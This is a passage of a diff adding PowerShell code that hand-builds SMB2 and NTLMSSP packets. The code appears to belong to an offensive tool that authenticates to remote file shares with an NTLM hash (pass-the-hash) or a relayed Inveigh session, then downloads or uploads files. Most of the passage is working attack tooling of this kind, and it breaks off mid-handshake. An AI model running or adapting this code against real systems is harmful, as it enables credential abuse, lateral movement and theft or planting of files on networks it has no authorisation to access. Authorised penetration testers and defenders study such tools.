+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Data_Length",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Tag",[Byte[]](0x44,0x48,0x6e,0x51))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Data_GUIDHandle",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($packet_extra_info -eq 3)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_ChainOffset",[Byte[]](0x20,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Data_Length",[Byte[]](0x08,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Tag",[Byte[]](0x41,0x6c,0x53,0x69))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_AllocationSize",$packet_allocation_size_bytes)
+ }
+
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_ChainOffset",[Byte[]](0x18,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Data_Length",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Tag",[Byte[]](0x4d,0x78,0x41,0x63))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+
+ if($packet_extra_info -gt 1)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_ChainOffset",[Byte[]](0x18,0x00,0x00,0x00))
+ }
+ else
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_ChainOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ }
+
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Data_Length",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Tag",[Byte[]](0x51,0x46,0x69,0x64))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+
+ if($packet_extra_info -gt 1)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_ChainOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Tag_Offset",[Byte[]](0x10,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Offset",[Byte[]](0x18,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Length",[Byte[]](0x20,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Tag",[Byte[]](0x52,0x71,0x4c,0x73))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+
+ if($packet_extra_info -eq 2)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Key",[Byte[]](0x10,0xb0,0x1d,0x02,0xa0,0xf8,0xff,0xff,0x47,0x78,0x67,0x02,0x00,0x00,0x00,0x00))
+ }
+ else
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Key",[Byte[]](0x10,0x90,0x64,0x01,0xa0,0xf8,0xff,0xff,0x47,0x78,0x67,0x02,0x00,0x00,0x00,0x00))
+ }
+
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_State",[Byte[]](0x07,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Duration",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ }
+
+ }
+
+ return $packet_SMB2CreateRequest
+}
+
+function New-PacketSMB2FindRequestFile
+{
+ param ([Byte[]]$packet_file_ID,[Byte[]]$packet_padding)
+
+ $packet_SMB2FindRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2FindRequestFile.Add("StructureSize",[Byte[]](0x21,0x00))
+ $packet_SMB2FindRequestFile.Add("InfoLevel",[Byte[]](0x25))
+ $packet_SMB2FindRequestFile.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2FindRequestFile.Add("FileIndex",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2FindRequestFile.Add("FileID",$packet_file_ID)
+ $packet_SMB2FindRequestFile.Add("SearchPattern_Offset",[Byte[]](0x60,0x00))
+ $packet_SMB2FindRequestFile.Add("SearchPattern_Length",[Byte[]](0x02,0x00))
+ $packet_SMB2FindRequestFile.Add("OutputBufferLength",[Byte[]](0x00,0x00,0x01,0x00))
+ $packet_SMB2FindRequestFile.Add("SearchPattern",[Byte[]](0x2a,0x00))
+
+ if($packet_padding)
+ {
+ $packet_SMB2FindRequestFile.Add("Padding",$packet_padding)
+ }
+
+ return $packet_SMB2FindRequestFile
+}
+
+function New-PacketSMB2QueryInfoRequest
+{
+ param ([Byte[]]$packet_info_type,[Byte[]]$packet_file_info_class,[Byte[]]$packet_output_buffer_length,[Byte[]]$packet_input_buffer_offset,[Byte[]]$packet_file_ID,[Int]$packet_buffer)
+
+ [Byte[]]$packet_buffer_bytes = ,0x00 * $packet_buffer
+
+ $packet_SMB2QueryInfoRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2QueryInfoRequest.Add("StructureSize",[Byte[]](0x29,0x00))
+ $packet_SMB2QueryInfoRequest.Add("InfoType",$packet_info_type)
+ $packet_SMB2QueryInfoRequest.Add("FileInfoClass",$packet_file_info_class)
+ $packet_SMB2QueryInfoRequest.Add("OutputBufferLength",$packet_output_buffer_length)
+ $packet_SMB2QueryInfoRequest.Add("InputBufferOffset",$packet_input_buffer_offset)
+ $packet_SMB2QueryInfoRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2QueryInfoRequest.Add("InputBufferLength",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2QueryInfoRequest.Add("AdditionalInformation",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2QueryInfoRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2QueryInfoRequest.Add("FileID",$packet_file_ID)
+
+ if($packet_buffer -gt 0)
+ {
+ $packet_SMB2QueryInfoRequest.Add("Buffer",$packet_buffer_bytes)
+ }
+
+ return $packet_SMB2QueryInfoRequest
+}
+
+function New-PacketSMB2SetInfoRequest
+{
+ param ([Byte[]]$packet_info_type,[Byte[]]$packet_file_info_class,[Byte[]]$packet_file_ID,[Byte[]]$packet_buffer)
+
+ [Byte[]]$packet_buffer_length = [System.BitConverter]::GetBytes($packet_buffer.Count)
+
+ $packet_SMB2SetInfoRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SetInfoRequest.Add("StructureSize",[Byte[]](0x21,0x00))
+ $packet_SMB2SetInfoRequest.Add("InfoType",$packet_info_type)
+ $packet_SMB2SetInfoRequest.Add("FileInfoClass",$packet_file_info_class)
+ $packet_SMB2SetInfoRequest.Add("BufferLength",$packet_buffer_length)
+ $packet_SMB2SetInfoRequest.Add("BufferOffset",[Byte[]](0x60,0x00))
+ $packet_SMB2SetInfoRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2SetInfoRequest.Add("AdditionalInformation",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SetInfoRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2SetInfoRequest.Add("Buffer",$packet_buffer)
+
+ return $packet_SMB2SetInfoRequest
+}
+
+function New-PacketSMB2ReadRequest
+{
+ param ([Int]$packet_length,[Int64]$packet_offset,[Byte[]]$packet_file_ID)
+
+ [Byte[]]$packet_length_bytes = [System.BitConverter]::GetBytes($packet_length)
+ [Byte[]]$packet_offset_bytes = [System.BitConverter]::GetBytes($packet_offset)
+
+ $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2ReadRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2ReadRequest.Add("Padding",[Byte[]](0x50))
+ $packet_SMB2ReadRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2ReadRequest.Add("Length",$packet_length_bytes)
+ $packet_SMB2ReadRequest.Add("Offset",$packet_offset_bytes)
+ $packet_SMB2ReadRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2ReadRequest.Add("MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Buffer",[Byte[]](0x30))
+
+ return $packet_SMB2ReadRequest
+}
+
+function New-PacketSMB2WriteRequest
+{
+ param ([Int]$packet_length,[Int64]$packet_offset,[Byte[]]$packet_file_ID,[Byte[]]$packet_buffer)
+
+ [Byte[]]$packet_length_bytes = [System.BitConverter]::GetBytes($packet_length)
+ [Byte[]]$packet_offset_bytes = [System.BitConverter]::GetBytes($packet_offset)
+
+ $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2WriteRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2WriteRequest.Add("DataOffset",[Byte[]](0x70,0x00))
+ $packet_SMB2WriteRequest.Add("Length",$packet_length_bytes)
+ $packet_SMB2WriteRequest.Add("Offset",$packet_offset_bytes)
+ $packet_SMB2WriteRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2WriteRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("Buffer",$packet_buffer)
+
+ return $packet_SMB2WriteRequest
+}
+
+function New-PacketSMB2CloseRequest
+{
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CloseRequest.Add("StructureSize",[Byte[]](0x18,0x00))
+ $packet_SMB2CloseRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMB2CloseRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CloseRequest.Add("FileID",$packet_file_ID)
+
+ return $packet_SMB2CloseRequest
+}
+
+function New-PacketSMB2TreeDisconnectRequest
+{
+ $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeDisconnectRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2TreeDisconnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2TreeDisconnectRequest
+}
+
+function New-PacketSMB2SessionLogoffRequest
+{
+ $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionLogoffRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2SessionLogoffRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2SessionLogoffRequest
+}
+
+#NTLM
+
+function New-PacketNTLMSSPNegotiate
+{
+ param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
+ [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
+ [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
+ [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
+ [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
+
+ $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPNegotiate.Add("InitialContextTokenID",[Byte[]](0x60))
+ $packet_NTLMSSPNegotiate.Add("InitialcontextTokenLength",$packet_ASN_length_1)
+ $packet_NTLMSSPNegotiate.Add("ThisMechID",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("ThisMechLength",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength",$packet_ASN_length_2)
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength2",$packet_ASN_length_3)
+ $packet_NTLMSSPNegotiate.Add("MechTypesID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength",[Byte[]](0x0e))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength2",[Byte[]](0x0c))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID3",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength3",[Byte[]](0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechTokenID",[Byte[]](0xa2))
+ $packet_NTLMSSPNegotiate.Add("MechTokenLength",$packet_ASN_length_4)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPID",[Byte[]](0x04))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPNegotiate.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_NTLMSSPNegotiate.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("NegotiateFlags",$packet_negotiate_flags)
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($packet_version)
+ {
+ $packet_NTLMSSPNegotiate.Add("Version",$packet_version)
+ }
+
+ return $packet_NTLMSSPNegotiate
+}
+
+function New-PacketNTLMSSPAuth
+{
+ param([Byte[]]$packet_NTLM_response)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
+ [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
+ $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
+ [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
+ $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
+ [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
+ $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
+
+ $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPAuth.Add("ASNID",[Byte[]](0xa1,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength",$packet_ASN_length_1)
+ $packet_NTLMSSPAuth.Add("ASNID2",[Byte[]](0x30,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength2",$packet_ASN_length_2)
+ $packet_NTLMSSPAuth.Add("ASNID3",[Byte[]](0xa2,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength3",$packet_ASN_length_3)
+ $packet_NTLMSSPAuth.Add("NTLMSSPID",[Byte[]](0x04,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPAuth.Add("NTLMResponse",$packet_NTLM_response)
+
+ return $packet_NTLMSSPAuth
+}
+
+function DataLength2
+{
+ param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+ $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+
+ return $string_length
+}
+
+if($Modify -and $Action -eq 'Put' -and $Source -isnot [Byte[]])
+{
+ $output_message = "[-] Source must be a byte array when using -Modify"
+ $startup_error = $true
+}
+elseif((!$Modify -and $Source -isnot [String]) -or ($Modify -and $Action -ne 'Put' -and $Source -isnot [String]))
+{
+ $output_message = "[-] Source must be a string"
+ $startup_error = $true
+}
+elseif($Source -is [String])
+{
+ $source = $Source.Replace('.\','')
+}
+
+[String]$session_string = $session
+
+if($session_string -and !$Inveigh -or !$inveigh.session_socket_table[$session])
+{
+ Write-Output "[-] Inveigh Relay session not found"
+ $startup_error = $true
+}
+elseif($session_string -and !$inveigh.session_socket_table[$session].Connected)
+{
+ Write-Output "[-] Inveigh Relay session not connected"
+ $startup_error = $true
+}
+
+$destination = $Destination.Replace('.\','')
+
+if($hash -like "*:*")
+{
+ $hash = $hash.SubString(($hash.IndexOf(":") + 1),32)
+}
+
+if($Domain)
+{
+ $output_username = $Domain + "\" + $Username
+}
+else
+{
+ $output_username = $Username
+}
+
+$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+#[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+[Byte[]]$process_ID_bytes = 0x00,0x00,0x00,0x00
+
+if(!$session_string_string)
+{
+ $SMB_client = New-Object System.Net.Sockets.TCPClient
+ $SMB_client.Client.ReceiveTimeout = 30000
+}
+
+$action_step = 0
+
+if($Action -ne 'Put')
+{
+ $source = $source.Replace('\\','')
+ $source_array = $source.Split('\')
+ $target = $source_array[0]
+ $share = $source_array[1]
+ $source_subdirectory_array = $source.ToCharArray()
+ [Array]::Reverse($source_subdirectory_array)
+ $source_file = -join($source_subdirectory_array)
+ $source_file = $source_file.SubString(0,$source_file.IndexOf('\'))
+ $source_file_array = $source_file.ToCharArray()
+ [Array]::Reverse($source_file_array)
+ $source_file = -join($source_file_array)
+ $target_share = "\\$target\$share"
+}
+
+switch($Action)
+{
+
+ 'Get'
+ {
+
+ if(!$Modify)
+ {
+
+ if($destination -and $destination -like '*\*')
+ {
+ $destination_file_array = $destination.ToCharArray()
+ [Array]::Reverse($destination_file_array)
+ $destination_file = -join($destination_file_array)
+ $destination_file = $destination_file.SubString(0,$destination_file.IndexOf('\'))
+ $destination_file_array = $destination_file.ToCharArray()
+ [Array]::Reverse($destination_file_array)
+ $destination_file = -join($destination_file_array)
+ $destination_path = $destination
+ }
+ elseif($destination)
+ {
+
+ if(Test-Path (Join-Path $PWD $destination))
+ {
+ $output_message = "[-] Destination file already exists"
+ $startup_error = $true
+ }
+ else
+ {
+ $destination_path = Join-Path $PWD $destination
+ }
+
+ }
+ else
+ {
+
+ if(Test-Path (Join-Path $PWD $source_file))
+ {
+ $output_message = "[-] Destination file already exists"
+ $startup_error = $true
+ }
+ else
+ {
+ $destination_path = Join-Path $PWD $source_file
+ }
+
+ }
+
+ }
+ else
+ {
+ $file_memory = New-Object System.Collections.ArrayList
+ }
+
+ }
+
+ 'Put'
+ {
+
+ if(!$Modify)
+ {
+
+ if($source -notlike '*\*')
+ {
+ $source = Join-Path $PWD $source
+ }
+
+ if(Test-Path $source)
+ {
+ [Int64]$source_file_size = (Get-Item $source).Length
+ $source_file = $source
+
+ if($source_file_size -gt 65536)
+ {
+ $source_file_size_quotient = [Math]::Truncate($source_file_size / 65536)
+ $source_file_size_remainder = $source_file_size % 65536
+ $source_file_buffer_size = 65536
+ }
+ else
+ {
+ $source_file_buffer_size = $source_file_size
+ }
+
+ $source_file_properties = Get-ItemProperty -path $source_file
+ $source_file_creation_time = $source_file_properties.CreationTime.ToFileTime()
+ $source_file_creation_time = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($source_file_creation_time))
+ $source_file_creation_time = $source_file_creation_time.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $source_file_last_access_time = $source_file_properties.LastAccessTime.ToFileTime()
+ $source_file_last_access_time = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($source_file_last_access_time))
+ $source_file_last_access_time = $source_file_last_access_time.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $source_file_last_write_time = $source_file_properties.LastWriteTime.ToFileTime()
+ $source_file_last_write_time = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($source_file_last_write_time))
+ $source_file_last_write_time = $source_file_last_write_time.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $source_file_last_change_time = $source_file_last_write_time
+ $source_file_buffer = new-object byte[] $source_file_buffer_size
+ $source_file_stream = new-object IO.FileStream($source_file,[System.IO.FileMode]::Open)
+ $source_file_binary_reader = new-object IO.BinaryReader($source_file_stream)
+ }
+ else
+ {
+ $output_message = "[-] File not found"
+ $startup_error = $true
+ }
+
+ }
+ else
+ {
+
+ [Int64]$source_file_size = $Source.Count
+
+ if($source_file_size -gt 65536)
+ {
+ $source_file_size_quotient = [Math]::Truncate($source_file_size / 65536)
+ $source_file_size_remainder = $source_file_size % 65536
+ $source_file_buffer_size = 65536
+ }
+ else
+ {
+ $source_file_buffer_size = $source_file_size
+ }
+
+ }
+
+ $destination = $destination.Replace('\\','')
+ $destination_array = $destination.Split('\')
+ $target = $destination_array[0]
+ $share = $destination_array[1]
+ $destination_file_array = $destination.ToCharArray()
+ [Array]::Reverse($destination_file_array)
+ $destination_file = -join($destination_file_array)
+ $destination_file = $destination_file.SubString(0,$destination_file.IndexOf('\'))
+ $destination_file_array = $destination_file.ToCharArray()
+ [Array]::Reverse($destination_file_array)
+ $destination_file = -join($destination_file_array)
+ }
+
+}
+
+if($Action -ne 'Put')
+{
+
+ if($source_array.Count -gt 2)
+ {
+ $share_subdirectory = $source.Substring($target.Length + $share.Length + 2)
+ }
+
+}
+else
+{
+
+ if($destination_array.Count -gt 2)
+ {
+ $share_subdirectory = $destination.Substring($target.Length + $share.Length + 2)
+ }
+
+}
+
+if($share_subdirectory -and $share_subdirectory.EndsWith('\'))
+{
+ $share_subdirectory = $share_subdirectory.Substring(0,$share_subdirectory.Length - 1)
+}
+
+if(!$startup_error -and !$session_string)
+{
+
+ try
+ {
+ $SMB_client.Connect($target,"445")
+ }
+ catch
+ {
+ $output_message = "[-] $target did not respond"
+ }
+
+}
+
+if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table[$session].Connected))
+{
+
+ $SMB_client_receive = New-Object System.Byte[] 81920
+
+ if(!$session_string)
+ {
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_client_stage = 'NegotiateSMB'
+
+ while($SMB_client_stage -ne 'exit')
+ {
+
+ switch($SMB_client_stage)
+ {
+
+ 'NegotiateSMB'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes[0,1] 0x00,0x00
+ $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_client_stage = 'exit'
+ $login_successful = $false
+ $output_message = "[-] SMB1 is not supported"
+ }
+ else
+ {
+ $SMB_version = 'SMB2'
+ $SMB_client_stage = 'NegotiateSMB2'
+
+ if([System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03')
+ {
+ Write-Verbose "[!] SMB signing is enabled"
+ $SMB_signing = $true
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x15,0x82,0x08,0xa0
+ }
+ else
+ {
+ $SMB_signing = $false
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x05,0x80,0x08,0xa0
+ }
+
+ }
+
+ }
+
+ 'NegotiateSMB2'
+ {
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2_message_ID = 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+
+ 'NTLMSSPNegotiate'
+ {
+ $SMB2_message_ID ++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
